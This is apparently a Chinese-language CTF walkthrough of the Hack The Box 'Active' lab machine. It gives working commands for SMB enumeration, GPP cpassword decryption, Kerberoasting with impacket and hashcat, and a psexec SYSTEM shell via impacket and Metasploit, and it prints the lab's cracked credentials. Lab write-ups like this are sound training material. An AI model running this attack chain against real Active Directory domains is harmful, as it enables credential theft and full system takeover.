这次的靶机是Hackthebox的Active

靶机IP地址:10.10.10.100

=================================================================

信息收集

nmap -sV -sT 10.10.10.100

Kerberos在88，netbios-ssn在139，ldap在389和3268。

SMB枚举

由于目标机器在139端口上开放了netbios-ssn，我们用smbmao扫描下看看能得到什么有用的信息

smbmap -H 10.10.10.100

这里我们发现只有Replication 允许读

我们用smbclient来访问下

之后，我们访问共享我们会发现一个名为Groups.xml

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

通过下载查看文件，我们将找到用户名和加密密码。

解密GPP

刚刚哪个加密的密码cpassword就是组策略密码GPP

我们利用gpp-decrypt来进行解密

我们得到了密码GPPstillStandingStrong2k18

现在我们有凭证SVC_TGS：GPPstillStandingStrong2k18我们可以拥有用户账号

smbclient //10.10.10.100/Users -U SVC_TGS

Kerberoasting

现在，如果我们返回到我们的nmap扫描。

我们将看到我们在端口88上运行了kerberos，我们现在拥有一个用户，所以我们将去kerberoasting

如果你不知道什么是kerberoasting技术，你可以阅读这3篇文章

第1部分

第2部分

第3部分

首先，我们将10.10.10.100添加到/ etc / hosts中

我们从Github下载并安装impacket以使用其python类GetUserSPN.py

github地址；https://github.com/SecureAuthCorp/impacket

这里的话我kali我里面会报出这个错误

不知道怎么解决，希望有会的人麻烦评论下。

然后我换了到win下进行操作

也是一样的 需要吧

10.10.10.100 active.htb 添加到HOSTS中去。

然后执行命令

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18

我们把其中的hash复制到hash.txt进行破解

然后在hashcat的帮助下我们找到了哈希模式，结果它显示了13100 for Kerberos 5 TGS-REP etype 23

hashcat -h |grep -i tgs

最后，是时候破解哈希并使用rockyou.txt wordlist获取密码。

hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force ---show

然后我们得到了管理员密码：Ticketmaster1968

下面介绍2种方法拿root shell

①还是用impact/example里面的psexec.py来获取root shell

python psexec.py administrator@active.htb

②用metaploit框架并运行以下模块来生成完整的权限系统shell

msf > use exploit/windows/smb/psexec

msf exploit windows/smb/psexec) > set rhost 10.10.10.100

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968

msf exploit(windows/smb/psexec) > exploit

最后分享一下这个导图，大家对hack the box 平台有一个完整清晰地了解~